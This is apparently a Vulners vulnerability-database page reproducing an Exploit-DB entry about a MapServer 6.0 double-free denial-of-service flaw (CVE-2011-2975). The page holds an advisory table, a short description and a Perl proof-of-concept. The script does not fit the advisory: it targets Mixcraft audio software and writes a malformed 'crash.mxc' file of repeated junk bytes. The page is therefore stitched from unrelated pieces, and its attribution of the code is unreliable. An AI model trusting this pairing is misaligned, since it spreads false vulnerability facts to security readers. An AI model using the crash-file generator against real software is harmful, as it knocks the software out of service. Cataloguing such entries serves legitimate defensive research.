Lucene search
+L

MapServer 6.0 - '.Map' File Double-Free Remote Denial of Service

🗓️ 30 Aug 2011 00:00:00Reported by rouaultType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 19 Views

MapServer 6.0 Remote Denial of Service due to Double Free Conditio

Related
Code
ReporterTitlePublishedViews
Family
ATTACKERKB
CVE-2011-2975
1 Aug 201120:55
attackerkb
Circl
CVE-2011-2975
30 Aug 201100:00
circl
CVE
CVE-2011-2975
1 Aug 201120:00
cve
Cvelist
CVE-2011-2975
1 Aug 201120:00
cvelist
Debian CVE
CVE-2011-2975
1 Aug 201120:00
debiancve
EUVD
EUVD-2011-2943
7 Oct 202500:30
euvd
NVD
CVE-2011-2975
1 Aug 201120:55
nvd
OSV
DEBIAN-CVE-2011-2975
1 Aug 201120:55
osv
Prion
Double free
1 Aug 201120:55
prion
UbuntuCve
CVE-2011-2975
1 Aug 201120:55
ubuntucve
Rows per page
source: https://www.securityfocus.com/bid/49374/info

MapServer is prone to a remote denial-of-service vulnerability due to a double free condition.

Attackers can exploit this issue to crash the application, denying service to legitimate users. Due to the nature of this issue, code execution may be possible; however, this has not been confirmed.

Versions prior to MapServer 6.0.1 are vulnerable.

#!/usr/bin/perl

print q(
########################################################
# home : http://www.D99Y.com
# Date : 9/8/2011
# Author : NassRawI
# Software Link : http://www.acoustica.com/mixcraft/
# Version : v1.00 Build 10
# Tested on : Windows XP SP2
########################################################
);

my $file= "crash.mxc";
my $junk= "\x64\x39\x39\x79\x2e\x63\x6f\x6d" x 1000 ;
open(d99y,">$file");
print d99y $junk ;
close(d99y);
print "\n [ # ] Vulnerable File Created !\n"

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation